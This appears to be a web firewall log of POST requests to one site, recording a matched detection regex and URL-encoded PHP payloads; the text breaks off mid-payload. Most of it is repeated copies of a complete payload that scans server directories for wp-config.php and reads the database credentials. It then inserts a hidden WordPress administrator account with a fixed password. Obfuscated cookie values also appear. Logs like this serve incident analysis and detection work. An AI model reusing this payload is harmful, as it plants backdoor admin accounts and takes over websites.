%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-user:?1\nupgrade-insecure-requests:1\ncontent-length:12640\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvE3LvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWdqKA0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?1\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Android\"\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\naccept:*\/*\n\nGv=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:00:50","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Cg:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-user:?1\nupgrade-insecure-requests:1\ncontent-length:12640\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvD2pvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAuL2uyVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-mode:navigate\naccept:*\/*\n\nCg=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2